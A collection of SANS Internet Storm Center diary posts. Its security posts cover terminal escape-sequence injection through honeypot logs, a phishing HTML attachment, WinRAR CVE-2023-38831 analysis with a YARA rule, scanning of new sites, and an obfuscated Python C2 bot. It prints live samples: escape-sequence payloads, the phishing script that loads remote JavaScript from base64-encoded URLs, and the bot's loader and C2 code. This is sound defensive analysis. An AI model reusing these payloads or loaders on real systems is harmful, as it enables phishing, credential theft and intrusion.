SANS

[This is a Guest Diary by James Turner, an ISC intern as part of the SANS.edu BACS program]

Introduction

In today's rapidly evolving cybersecurity landscape, vigilance is the key. But what if the very tools designed to detect and analyze threats could be turned against us? In this exploration, we dive into the world of honeypots, their valuable logs, and the potential vulnerabilities that lie within. Understanding the use and application of honeypots and their associated dangers isn't just a theoretical exercise; it's a necessity. Cybersecurity professionals, threat analysts, and IT administrators stand at the forefront of this battlefield and should know the dangers that lurk in the logs.

Why do we run honeypots?

A honeypot is a system which is deliberately vulnerable. These honeypots are run by analysts all over the world and help to provide useful information.

The Internet Storm Center (ISC) at SANS utilizes honeypots for several reasons:

• Threat intelligence for insights into techniques, tactics, and procedures.
• Early warning of emerging attacks which would affect the broader information systems community.
• Study and research of malware to develop better defense mechanisms.
• Training and education which provides students with real-world attack scenarios.
• Better training of students to prepare as cybersecurity professionals.

What logs does the honeypot collect?

In terms of log files, there are significant logs which the honey pot collects. Firewall logs describe the attempted, and blocked connections. This includes the date and time, source IP, destination IP, source port, destination port, and protocol. Other logs include terminal session logs such as ssh and telnet, which store issued commands and files downloaded via secure copy or curl commands. Finally, it also stores web connections such as http header information, http method, http endpoints, and other relevant web data.

The Analyst 

Generally, there is an analyst examining the log files created by the honeypot. This can occur though many different processes, but for now we’re going to examine the use of a terminal. A terminal is a software-based interface designed to receive, display, and send text-based data from a computer system to a shell. The shell being the command interpreter which directly interacts with the underlying operating system. Using a terminal running on their local computer, the analyst can interact with a remote system’s operating system shell. 

In the context of terminals, escape sequences can be used to control the appearance and behavior of a terminal. For example, ANSI escape codes are used to set text colors, move the cursor and much more. It’s worth mentioning that the exact behavior of these escape characters can vary from system to system as well as terminal software and version being used. 

Escape sequences have long been used to create ASCII art on screens and allow for customization of a user’s terminal. Because most terminals support some kind of escape sequences, it could be possible to manipulate the analyst’s terminal, and hypothetically allow for remote code execution on the analysist’s system. 

The Escape

Building on the incredible work of many security researchers including David Leadbeater [9] and STÖK Fredrik [10] whose DEF CON 31 presentations [11] ultimately inspired this blog post and research. To escape in the terminal, we need to understand how this happens. The ANSI standards have been around a long time and were among the first means for a user to interact with a computer. The standard was named X3.4-1967 also known as US-ASCII [1]. The escape character is a control code and is represented as a hex value of \0x1b but can also be represented as \e or \033. Once we escape the terminal, there are several options we can work with to interact with the terminal using a control sequence introducer (CSI) typically represented as an open square bracket ( [ ). After this we pass arguments delimited by semicolons. Then finally we call one of the many kinds of CSI functions built into the standard library [2]. 

Here's the breakdown:

Escape Sequence = 0x1B 
Control Sequence Initiator = [
Function Argument = 33
Function Name = m

In the example 

"\0x1B[33mTHIS IS YELLOW TEXT\0x1B[0m"

Again, we may need to alter our text based on the terminal, but the effect is the same with this example 

"$([char]0x1b)[33mTHIS IS YELLOW TEXT$([char]0x1b)[0m "

Here we can set the terminal text color as yellow.

In the example given above, the escape character is given at the end to reset the terminal text color (0 represents a reset).

Poisoning the Honeypot Download Logs

Now that we have a functional model for manipulating a PowerShell terminal, we can test it. This demonstration is not meant to show specific examples of exploitation or remote code execution, but a proof of concept about the possibility of weaponizing the logs themselves. Construction and Delivery of payload:

Once logged into the honeypot as the analyst we can navigate to the directory and examine our files:

We can also execute a buffer overflow attack where the reading of the file causes the terminal buffer to flood with specific characters. This is done by selecting a repeating character, quantity of occurrence and finally the ";b" argument which repeats the preceding character the quantity specified [3].  Here we install trillions of playful penguins to the terminal, several times with this file. Then deliver the payload for the analysist to inspect.

The analyst’s examination of the file with a cat command results in a buffer flood of penguins and/or unknown characters. 

Scrolling all the way up to the top we’ve lost the beginning of the log. This creates the possibility of concealing other activities which are escaped before the march of the penguins. 

We have now manipulated the local terminal with an escape character presented from the remote operating system. Our Escape Injection attack works with a file transfer. Now we can examine more possible outcomes. 

One possible option is the Operating System Command (OSC) function 8. OSC 8 enabled hyperlinks in terminal text [4]. But it appears as I the initiator for OSC is closed square bracket ( ] ). Now we can test the use of OSC 8. At this point we can direct a user to a malicious site or have them execute code on their computer. 

 

Here we find our file and examine the output. Now we see an error message very similar to a Microsoft error message related to a kb article, and it’s conveniently hyperlinked. Clicking the link launches calc.exe. This link could be crafted to represent any number of plausible realistic looking errors.

Moving closer to the analyst’s machine we can insert data into the user’s clipboard with OSC 52. OSC 52 requires a base64 encoded string to inject into the user's clipboard [5]. So, we craft our command we want to put into the analyst’s clipboard.

Craft and deliver the payload.

Then upon examining the payload, we can see the payload in the user’s clipboard upon pasting.

A truly annoying payload which will likely force the analyst to terminate the terminal session is the tracking of mouse movements in the terminal. The CSI symbol "?" allows for the tracking of mouse movements [3]. 

According to the documentation we need to use this format after the escape:

? + Parameter + h

The payload would look something like this if we wanted to include all of the parameters:

'\033[?1001h\033[?1002h\033[?1003h\033[?1004h\033[?1005h\033[?1006h\033[?1007h\033[?1015h\033[?10016h\'

Crafted with all parameters and delivered the payload.

Next is the examination of the payload by the analyst. 

Every movement of the mouse is reported to the terminal, pressing enter right now would result in all these nonsensical commands being posted to the honeypot shell. If the terminal stays open any movement in the terminal will continue send the output location of the mouse in the terminal to the terminal. 

If we control C (^C) then it will stop the output in the terminal but moving into the terminal with the mouse will resume the output. This will inevitably cause the analyst to close the terminal session and begin a new session.

The image above shows this to be a perpetual problem, therefore the analyst must keep all the mouse movements away from the terminal.

Finally, we can begin to examine a final Operating System Command. OSC 9. Not all operating systems support this code and further research would be required, but according to OSC 9 “Run some process with arguments” is a possible outcome from an escape [6]. 
 

There are already several CVEs associated with Windows Terminal Remote Code Execution Vulnerabilities. For example, CVE-2022-44702 [7]. 

Here is an example of what a command might look like.

'\033]9;7;”<some_command>”\007'

Safer Log analysis

We can easily overcome these escape sequences by first being aware of their existence. Knowing that the mere action of reading a file and possibly data over a terminal could result in the transfer of concealed escape sequences which can impact the local system. 

As a practical matter, keeping terminals software up to date will also help. For the examples shown Windows Terminal was downloaded from the Microsoft Store. However, terminals exist in many forms including within programs like VS Code, Putty, kitty, Microsoft PowerShell, Git Bash for Windows, Windows Subsystem for Linux (WSL). Each of these different types of terminals may have unique vulnerabilities associated with them and the version running. They may also be vulnerable depending on the operating system running them. 

Another method of prevention is that the analyst can be more careful of the inspection of the files on the honeypot. The command file will not only reveal that the captured download is an ASCII file, but also that it contains escape sequences. This provides an early warning that any examination of the file directly into the terminal may cause harm or change to the expected output. 

Other methods of examination might include the examination of the file using methods which would display non-printing characters. In the example below we’re still using cat to examine the file but we’re adding the -v switch which is intended to show non-printing characters [8].

Other possible methods may be to build a script to watch the download directory where log files are deposited, then examine new files for escape sequences as they come in. This can be accomplished by replacing the escape sequence text with text the analyst defines. In any case it is the analyst’s responsibility to protect themselves against these methods of attack against the log files.

Other areas of research

The scope of this proof of concept was limited to a single operating system (Windows 10) and a single terminal (Windows Terminal). Testing of various operating systems and terminals may yield different outcomes and different results. Here we examined the possibility of weaponizing the downloaded files to the honeypot. Other possible areas of future research and testing could include the effect of direct reading of log files with escape sequences directly written to the honeypot logs and JSON logs, as well as examining the log files which are associated to web access endpoints. This may also require more coordination with the ISC at SANS to determine the effects of introducing URL encoded escape sequences to the ISC, and the subsequent examination of the server logs and files.

Conclusion

As cybersecurity continues to evolve, so does the sophistication of threats. The potential for weaponizing or otherwise annoying the analyst with honeypot logs, as demonstrated, is a testament to the creativity and persistence of cyber adversaries. However, understanding these dangers can give us an edge in being prepared for anything. By remaining aware and proactive, analysts and IT professionals can easily thwart such potential threats. As we uncover one method of exploitation, undoubtedly, innovative challenges will emerge. But, with the ISC and SANS continuous research, sharing of knowledge, vigilance, we will be better equipped to face the challenges of the future.

[1] https://sltls.org/ASCII
[2] https://notes.burke.libbey.me/ansi-escape-codes/
[3] https://invisible-island.net/xterm/ctlseqs/ctlseqs.html
[4] https://github.com/microsoft/terminal/issues/204
[5] https://github.com/PowerShell/PowerShell/issues/18116
[6] https://conemu.github.io/en/AnsiEscapeCodes.html#ConEmu_specific_OSC
[7] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44702
[8] https://www.man7.org/linux/man-pages/man1/cat.1.html
[9] https://dgl.cx
[10] https://www.stokfredrik.com/
[11] https://media.defcon.org/DEF CON 31/DEF CON 31 presentations/
[12] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Those of us who teach security awareness courses are often asked “Why would someone target ME?” or “Why would someone target OUR organization?”. Though these sentiments aren’t nearly as common as they used to be, since even mainstream media seem to cover cyber-attacks on at least a weekly basis, and – as a result – even non-IT specialists are becoming aware of the ubiquity of cyber-attacks, such questions still come up, both when teaching “regular” employees as well as when it comes to board-level security trainings.

To my mind, the old proverb “opportunity makes the thief” describes the main issue with cybercrime quite well – the internet is a very “target-rich” environment, and it is incredibly easy/cheap to create a simple piece of malicious code or launch a basic attack. The aforementioned low costs mean that when it comes to generic attacks, threat actors don’t discriminate, and they target pretty much everyone, and nothing demonstrates this better that generic, “un-targeted” phishing e-mails.

It is, of course, true, that most generic phishing messages will be – either immediately or very soon after they are delivered to their first recipients – detected and blocked by any security solution worth the name, nevertheless, if even one in a thousand or ten thousand e-mails leads to a recipient downloading a malicious file or typing valid credentials into a phishing website, sending such messages out is still a worthwhile endeavor from the threat actors point of view. The fact that their creations are soon being blocked is not necessarily significant since the cost of modifying a phishing message or its attachment or creating a new one is quite low.

Few weeks ago, I came across phishing message, which seemed to me to be a literal manifestation of this "cheap and simple" approach.

The e-mail in question was sent with a spoofed sender address in its header, making it look like it came from the recipient himself. Though this meant that it would be blocked/quarantined if DMARC was properly set up for the domain of the recipient, it also meant that if DMARC (or other relevant filtering mechanism) wasn’t in place and the e-mail made it to the recipient’s inbox, Outlook (and other clients potentially too) might “helpfully” display a photo of the recipient as a sender, should the photo be available as part of the contact information, thus making the e-mail look more legitimate.

As you may see, the message subject mentioned a received voice call and the body of the e-mail was left completely empty – so far (besides the spoofed sender address), it was as basic as a malicious e-mail could be. But what made the “simple and cheap” theme complete was the HTML attachment, which only contained the following 6 lines.

<script> var iam = "[name]@[domain].com"; var gate = "aHR0cHM6Ly9kb25ld2VsbGJ5d2VsbC5jb20vZW5lcmFsLnBocA=="; var crea8 = "aHR0cHM6Ly9kb25ld2VsbGJ5d2VsbC5jb20vcGFnZS5qcw=="; document.write('<script src="'+atob(crea8)+'"><\/script>'); </script>

The gate variable contained the Base64-encoded URL hxxps[://]donewellbywell[.]com/eneral[.]php and the crea8 variable contained encoded URL hxxps[://]donewellbywell[.]com/page[.]js. The domain mentioned in the two URLs was registered only two days before the e-mail was sent[1], which seems to indicate that it was intended to be a disposable domain used (primarily) in this campaign… Which agrees well with the “it’s cheap to do cybercrime” theme.

It probably won’t come as a surprise to you that the JavaScript loaded from the external URL was supposed to display a fake Microsoft login prompt.

Though the JavaScript loaded from the external domain was not as simple as the rest of the attack (it was heavily obfuscated and "weight in" at 155 kB) and it might therefore seem like it went against the “cheap and simple” approach, the fact that it was hosted externally allowed for it to be reused between campaigns… Which is what the threat actors did – looking at VirusTotal, one can see that the same JavaScript file has been in use since at least May of this year[2]. Therefore, even if development of the file (or its purchase) might have been somewhat more costly than the rest of the attack, through reuse, it would pay for itself in the long term…

As we can see from this small example, in 2023, it still makes sense for the threat actors to send out an obviously suspicious 6-line HTML file in an empty e-mail with a spoofed sender address… Proving that the cost of committing cybercrime can be really low.

[1] https://whois.domaintools.com/donewellbywell.com
[2] https://www.virustotal.com/gui/file/a7e17ecb0fa26f589bad906ed411af2142fbf9668841f7af613fcb861a672961/relations

-----------
Jan Kopriva
@jk0pr
Nettles Consulting

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

With what is (or was by now?) hurricane Idalia crossing past my house today, I decided to write a quick summary of what I usually do in cases like this to prepare. This is for a home office or a small business, assuming you have the resources for a typical home. Unlike natural disasters like Earthquakes, Hurricanes are somewhat predictable, and you typically have a couple of days warning. If you live in a hurricane-prone area like Florida, you are likely familiar with nhc.noaa.gov. The site provides "raw data" about current storm activity and avoids some of the hype added by some news outlets.

Let me know if you have any other tips to share.

An important decision you must make early is whether you plan to evacuate. Some steps below need to be accelerated in case you plan to evacuate. Evacuation is best done while it is still clear and sunny, typically at least 24 hours before the storm hits and before official mandatory evacuation orders are issued. Below, I will focus on the IT aspects and not cover general preparedness items.

So here is my brief list of things to consider.

Backups

Backups are always important, but this is a good time to check if they work as expected. Check if your backup software reported any errors. Ideally, you will have an offsite backup (some form of cloud backup). However, recovering from cloud backups can be slow. If you have non-mobile computers, consider keeping daily mirrors on a portable USB drive. I like to mirror my main workstation and laptops daily to a bootable USB drive. This has saved me a few times when a hard drive failed, and I could quickly boot to a replacement system.

This may not strictly count as a "backup". But make sure you have some important information printed on paper. This includes phone numbers of relatives and maybe recovery information for a password wallet. Maybe even a few critical SSH keys and similar information.

Do unplug backup drives as the hurricane comes closer. You do not want to simultaneously damage your computer and the backup drive due to a power surge.

Power

Storms are often associated with power outages, even if you are only experiencing the outskirts of a large hurricane. Outages can last from minutes to several days. Generators covering a longer outage are nice but too expensive for most homes or small businesses. The next best option is battery backup. Even with a generator, battery backups (UPSs) are needed to cover the time until the generator starts. Some use portable generators which can work to power critical devices. Make sure you observe generator safety rules.

If you have time (no closer than two days before the storm), run a runtime test of your UPS. Many UPSs have a feature to automatically run the UPS until it is almost out of power. If possible, do not test the UPS by pulling the plug. This works okay most of the time, but removing ground from your systems can have unintended consequences, and power may find other paths to ground, like network cables and damaging equipment. You will need enough time to charge the UPS after this test.

A battery test will not only ensure that your batteries are working. You will also have fully charged batteries and a better idea of how long they will last. 

It is important to note that solar panels only typically provide backup power if you also have batteries. Solar panels are usually configured to automatically turn off power delivery in case of a grid failure. First of all, this happens to protect utility workers, and second, the solar cells cannot maintain consistent power. Some newer inverters have this feature, but these inverters are rare. The same is true for generators: Your solar system must turn off once your generator starts unless you use inverters specifically designed to support generators.

To save power and equipment, try to power down as much as possible if you believe a power outage is imminent. Power outages sometimes cause voltage spikes or "brownout" conditions that damage sensitive equipment. The same is true for the strong thunderstorms often seen around hurricanes. If possible, unplug the power and network cable from the equipment. You may want to consider disconnecting the main breaker to the house if it is easily accessible. Of course, this may make it difficult to detect if power has been restored.

Network

Another weather phenomenon I am all too familiar with in Florida is thunderstorms. Thunderstorms not only cause power outages, but they can also cause dangerous power surges. In my nearly 20 years living in Florida, I have experienced two strikes directly or close to my house. In both cases, network equipment was damaged. Surge protectors help, but they do not always protect you. In one case, the surge entered through the cable modem line. Luckily, the cable modem acted somewhat as a "fuse." Large electric fields that coincide with lightning may also induce currents in network cables that will destroy equipment. Network ports are not rated for these kinds of conditions. There are a few things you can do to protect your network equipment:

• Ethernet Surge Protectors: I use them for outdoor mounted security cameras. Not all ethernet surge protectors are created equal. Some do not support gigabit ethernet or do not support power over ethernet. I have no idea how to figure out if a surge protector is "good," but the one I have so far seems to work.
• Coax Surge Protectors: Adding a surge protector outside my house where the coax cable line enters the house seems to help. Make sure it is well connected to the ground line. Usually, the cable company will install the ground connection but not a surge protector. They are easy to install. Just ensure it is rated for the frequency range needed for the cable modem. Lucky you if you have a fiber connection. This way, you are already protected :).
• Use fiber optic cables: A network cable is essentially an antenna. The longer the cable, the more likely it will be affected by the electric fields generated by lightning. After some bad experiences, I replaced some of the longer network cables in my house with fiber. Less for the increased speed but more for electrically isolating different network parts. So far, this has worked well and does not have to be expensive. Fiber optic cables are not much more costly than high-quality copper cables. The only disadvantage is that you cannot terminate your cables easily.

Internet Connectivity Backup

Tethering to a cell phone is the simplest solution to maintain internet connectivity for individual systems. Most "unlimited" plans only allow a few gigabytes of high-speed data, but it should last a day or two. A better solution is to use a "hotspot" device and connect it to your router, but this is more expensive. T-Mobile and Verizon have been offering "Home Internet" solutions that you may want to consider for backup. In my experience with T-Mobile, they work well if you are in the correct location. Data usage is unrestricted for home internet plans. But cellphone towers may also go down if you experience high winds and extended power outages.

Satellite solutions are probably the best internet backup. But this can be a bit expensive for a home office, with plans for Starlink starting at around $100/month. 

Whatever you use for backup connectivity: Test it a few days before the storm.

Evacuation

Shut down and unplug equipment you do not need while you are gone. You may want to keep some devices (mode, router, security cameras) powered up. But the more you shut down, the better. 

As I am making this diary live, All is good so far in Jacksonville: some rain and gusts, but no significant issues and limited power outages.

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Many, many years ago we (SANS Internet Storm Center) published some interesting research about survival time of new machines connected to the Internet. Back then, when Windows XP was the most popular operating system, it was enough to connect your new machine to the Internet and get compromised before you managed to download and install patches. Microsoft changed this with Windows XP SP2, which introduced the host based firewall that was (finally) enabled by default, so a new user had a better chance of surviving the Internet. 

We still collect and publish some information about survival time, and you can see that at https://isc.sans.edu/survivaltime.html.

Now, 20 years after, most of us do not have our workstations and laptops connected directly to the Internet, however new web sites get installed and put (on the Internet) every second. I recently had to put several web sites up and was surprised as how fast certain scans happened so I decided to do some tests on survival time of new web sites.

Certificate transparency

Today, when you setup a new web site, one of mandatory steps is to get an SSL/TLS certificate for your web site. We have come a long way from initial certificates which were very expensive to today’s Let’s Encrypt certificates, that allow anyone to obtain a certificate that is trusted by any major browser, completely for free.

In order to make the certificate issuance transparent and verifiable, the Certificate Transparency (CT) ecosystem was created, by some of the biggest players in this field (Apple, Google, Facebook …).

Certificate Transparency allows monitoring of what certificates are issued by a Certificate Authority. This is done by publishing information about every single issues certificate into publicly available logs, which are append only, built using Merkle trees, and tamper-proof.

The idea is great, and is today widely accepted by all major browsers – they actually require that the certificate has been added to the Certificate Transparency (CT) log before accepting this certificate. This is generally done by adding Signed Certificate Timestamp (SCT) extension to a certificate.

Now, since the whole database is public (remember, transparency above), we can even query it. Good folks are Cali Dog even created a web page, and a CLI tool that allows us to query the database in real time (https://certstream.calidog.io/), while you can always see historical data at Censys (https://search.censys.io/) or CRT.sh (https://crt.sh/). 

For our survival time, it is the real-time feed that is interesting. Once you install the client tool for certstream, you can just start it and see zillions of new domains flow in, as shown below:

Survival time

This is what prompted me to check the survival time of web sites – basically, as soon as a new certificate has been issued by a CA participating in Certificate Transparency (and that’s virtually any trusted CA today), information about the issued certificate is public!

I did a little test – I started certstream and was looking only for my domains and then issued a request for the site1.isc.mydomain.com domain to Let’s Encrypt. It took couple of seconds for the request to result in a new certificate, and almost instantly I saw the record appear in certstream:

[2023-08-28T11:34:33.988190] https://oak.ct.letsencrypt.org/2023/ - site1.isc.mydomain.com

This was all sub-second, and is OK and expected. However, what I did not expect was to see the following logs appear on my server, again almost instantly:

134.122.89.242 - - [28/Aug/2023:09:34:34 +0000] "GET / HTTP/1.1" 302 5685 "-" "-"
134.122.89.242 - - [28/Aug/2023:09:34:35 +0000] "GET / HTTP/1.1" 302 5685 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA535528) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2892.98 Mobile Safari/537.3"
134.122.89.242 - - [28/Aug/2023:09:34:35 +0000] "GET /.vscode/sftp.json HTTP/1.1" 302 5685 "-" "Go-http-client/1.1"
134.122.89.242 - - [28/Aug/2023:09:34:35 +0000] "GET /about HTTP/1.1" 302 1076 "-" "Go-http-client/1.1"
134.122.89.242 - - [28/Aug/2023:09:34:35 +0000] "GET /debug/default/view?panel=config HTTP/1.1" 302 1102 "-" "Go-http-client/1.1"
134.122.89.242 - - [28/Aug/2023:09:34:35 +0000] "GET /v2/_catalog HTTP/1.1" 302 1076 "-" "Go-http-client/1.1"
134.122.89.242 - - [28/Aug/2023:09:34:35 +0000] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 302 1076 "-" "Go-http-client/1.1"
134.122.89.242 - - [28/Aug/2023:09:34:35 +0000] "GET /server-status HTTP/1.1" 302 1076 "-" "Go-http-client/1.1"
134.122.89.242 - - [28/Aug/2023:09:34:35 +0000] "GET /login.action HTTP/1.1" 302 1076 "-" "Go-http-client/1.1"
134.122.89.242 - - [28/Aug/2023:09:34:35 +0000] "GET /.DS_Store HTTP/1.1" 302 1076 "-" "Go-http-client/1.1"
134.122.89.242 - - [28/Aug/2023:09:34:35 +0000] "GET /.env HTTP/1.1" 302 1076 "-" "Go-http-client/1.1"
134.122.89.242 - - [28/Aug/2023:09:34:35 +0000] "GET /.git/config HTTP/1.1" 302 1076 "-" "Go-http-client/1.1"
134.122.89.242 - - [28/Aug/2023:09:34:35 +0000] "GET /s/632313e2733313e2430313e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 302 1076 "-" "Go-http-client/1.1"
134.122.89.242 - - [28/Aug/2023:09:34:35 +0000] "GET /config.json HTTP/1.1" 302 1076 "-" "Go-http-client/1.1"
134.122.89.242 - - [28/Aug/2023:09:34:35 +0000] "GET /telescope/requests HTTP/1.1" 302 1076 "-" "Go-http-client/1.1"
134.122.89.242 - - [28/Aug/2023:09:34:35 +0000] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 302 1126 "-" "Go-http-client/1.1"

My brand new site was almost scanned instantly by a scanner running at Digital Ocean - and this was only the first scan, which happened to be done by https://leakix.org - soon I observed dozens of other requests.

Since the scanner new exactly what virtual site to send a request to, and the request was sent almost immediately after I got the certificate, it is clear that attackers are also monitoring the Certificate Transparency database and that they are scanning new sites immediately as they appear online.

If we look at the requests above, we can see that they are trying to pickup some low hanging fruit – which makes sense, they actually want to catch misconfigured websites before an administrator had a chance to configure them (unless they did this before issuing the certificate, as they should).

Increasing visibility

It is clear that attackers will abuse anything they get their hands on. As survival time, back 20 years ago was getting close to 10 seconds for a new Windows XP machine, we can see that today, for web sites, it’s almost even less than that. Of course, if an administrator properly configures and hardens their web site, all will be good, but we can expect to see some scanning almost instantly as we are on the Internet.

Why not using this to our advantage as well? One of the recommendations I always give organizations to protect themselves is to monitor if there are any certificates issued with your own organization name in them!

For example, we could run certstream and just grep our organization’s name (provided it is unique enough). We might detect certificates we were not aware of, both issued for legitimate purposes, but also those requested by attackers, perhaps for phishing campaigns. 

So, let use this data as much as we can. Let us know if you have any other good use cases for Certificate Transparency data!

--
Bojan
@bojanz
INFIGO IS

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

My tool zipdump.py can be used to analyse the latest exploits of vulnerability CVE-2023-38831 in WinRAR.

The vulnerability is exploited with specially crafted ZIP files.

Here is the output of zipdump analyzing a PoC file I created:

What you want to look for, is:

1. a folder ending with a space character (" /")
2. a file with the same name as the folder (also ending with space character)
3. a file inside folder 1, starting with filename 2 and with an extra extension, like .bat

When this ZIP file is opened with a vulnerable version of WinRAR, and file 2 is double-clicked, file 3 is extracted and executed.

The space character at the end of file 2 is not visible with the default output of my tool zipdump. Therefor it is best to use option -f l to find and analyze all PKZIP records found inside the file:

This output uses Python's binary string representation (b''), and here the space character can be clearly seen because of the ' delimiter.

To know what the payload is of this PoC exploit, you need to analyze file 3. In my example, it launches calc.exe:

Exploits found in the wild will contain many files. Like this sample:

To quickly find the file that will be executed, use the following trick: grep for the fileextension followed by a space character and a dot. In this sample, the directory ends with ".jpg ". Thus do a grep (no regex: -F) for ".jpg .":

So the payload is file 77, a .cmd file:

This .cmd file launches Images[.]com:

There are even more complex exploits found in the wild, that are a concatenation of several zip files, or where the PKZIP records have been tampered with. Should you need to analyse such samples, I recommend to use zipdump's option -f l.

And finally, I share a YARA rule I use to hunt for CVE-2023-38831 exploit files. It's very generic: it looks for PKZIP dir records: one with a filename that ends with " /" and one with a filename that contains both " /" and " .". It's a bid broad, as it does not check if the file is a proper ZIP file (just if it contains PKZIP dir records), and it doesn't check if there are at least 2 PKZIP records and it does not check the order of " /" and " .".

rule rule_cve_2023_38831 { strings: $PKDIR = { 50 4B 01 02 } condition: for any i in (1 .. #PKDIR): ( uint8(@PKDIR[i] + uint16(@PKDIR[i] + 0x1C) + 0x2E - 1) == 0x2F and uint8(@PKDIR[i] + uint16(@PKDIR[i] + 0x1C) + 0x2E - 2) == 0x20 ) and for any i in (1 .. #PKDIR): ( for any j in (0 .. uint16(@PKDIR[i] + 0x1C) - 2): ( uint8(@PKDIR[i] + j + 0x2E) == 0x20 and uint8(@PKDIR[i] + j + 0x2E + 1) == 0x2F ) and for any j in (0 .. uint16(@PKDIR[i] + 0x1C) - 2): ( uint8(@PKDIR[i] + j + 0x2E) == 0x20 and uint8(@PKDIR[i] + j + 0x2E + 1) == 0x2E ) ) }

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

When you must investigate suspicious behavior or work on an actual incident, you could be asked to determine who’s behind a network connection. From a pure network point of view, your firewall or any network security control device/app will tell you that the source is the connection is host « A », « B » or « C ». But investigating further how to discover who or which process is the source of the connection (now, at the operating system level).

I faced this situation recently when a customer asked me for help to link a process to a suspicious TCP connection performed regularly by a Macbook. How to achieve this?

My first reflex was to mention LittleSnitch (I’m a big fan of it and have used it for years). This egress firewall will notify you when a process attempts to connect to a network service (and you can approve/deny the request).

A really fantastic tool to see in a friendly GUI what’s happening. But LittleSnitch wasn’t installed. You need to install a demo license, which is not convenient in this case.

If MacOS is a graphical OS, it comes with plenty of « UNIX » tools that might be helpful. You can use « lsof » to gather a list of network flows and their associated PIDs. The problem here is root access is required or sudo access. In my case, the end-user had no admin rights on the Macbook.

xavier : ~ $ sudo lsof -i|grep -i firefox firefox 5356 xavier 94u IPv4 0x505ae1c0f002003 0t0 TCP 192.168.254.212:52429->55.65.117.34.bc.googleusercontent.com:https (ESTABLISHED)

Finally, MacOS comes with a lot of « Apple » tools. One of them is nettop. A command, available for years that displays the network flows in real-time and… the applications! The cool stuff is that no root nor sudo access is required to run it. If you can use nettop in interactive mode (like the well-known top tool) and sort flows in many ways, there is a more automated way to use it and log useful information for some time:

xavier : ~ $ nettop -L 0

This command will dump all connections and their associated process at regular intervals (and for an unlimited amount of time with the value "0"). The output format will be CSV.  If we search for Firefox, we will see this:

12:49:53.399032,firefox.5356,,,5427,1386,0,0,0,,,,,,,,,,,, 12:49:53.392327,tcp4 192.168.254.212:52429<->55.65.117.34.bc.googleusercontent.com:443,en7,Established,5427,1386,0,0,0,39.81 ms,131072,69376,BE,-,cubic,-,-,-,-,so,

(Be careful; the process name is not present on all lines! Connections are grouped under the line describing the process)

This tool has many features not covered here, have a look at the manpage. You can leave this command running and analyze the logs later!

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

For modern malware, having access to its C2 (Command and control) is a crucial point. There are many ways to connect to a C2 server using tons of protocols, but today, HTTP remains very common because HTTP is allowed on most networks...

I found a malicious Python script that is pretty well obfuscated. The applied technique reduces its VT  score to 6/60! It's based on a mix of Based64- and Hex-encoded data.

joy = '\x72\x6f\x74\x31\x33' trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + eval('\x67\x6f\x64') + eva l('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29') eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))

Note that '\x72\x6f\x74\x31\x33' is "ROT13!

If the payload is obfuscated, the following lines attracted my attention at the very beginning of the first-stage script:

host = "akfksfjriwjerijweijriewjesjresjfsdfmsdkfjksdjfksdjfsdf" user = "https://discord.gg/ZHnJfPS6" database = "https://discord.gg/ZHnJfPS6" password = "https://discord.gg/ZHnJfPS6" port = 5432

The port 5432 is used to connect to Postgresql database servers! Unfortunately, it was not possible to get the database server connection details. Probably, the script was submitted to VT as a test. The presence of this line also reveals that SQL queries will be performed:

import psycopg2

The decoded payload contains a lot of SQL queries and reveals C2 communications.

The computer registration:

self.createCur() self.devid = str(randint(0, 999999)) self.cur.execute("INSERT INTO zday (devid, ip, hostname) VALUES ('" + self.devid + "', '" + ip + "', '" + host + "')") self.conn.commit() self.cur.close()

Reception of commands to execute:

self.createCur() self.cur.execute("SELECT command FROM zday WHERE devid = '" + self.devid + "'") res = self.cur.fetchone() command = res[0] if devmode: print("command: " + str(command)) if command is not None: self.cur.close() self.parseCommand(command) else: self.cur.close()

Upload a file:

self.createCur() self.cur.execute(f"UPDATE zday SET file = {psycopg2.Binary(self.get_bytes_from_file(path))} WHERE devid = '" + self.devid + "'") self.conn.commit() self.cur.close()

Thanks to the parseCommand() function analysis, we can build a list of the bot capabilities:

• getPublicIp
• getWifiPasses
• dir
• addToWinStartup
• SVCSploit
• getCDIR
• addLocalToAdmin
• screenshot.get
• getVersion
• sysInfo
• disconnect
• killKeylogger
• fireFig
• userPriv
• storedCred
• netCon
• dnsList
• 'netConf
• arpCache
• localAdmin
• samBak
• schedTasks
• 'regup
• webcamPic
• hideMe
• runas
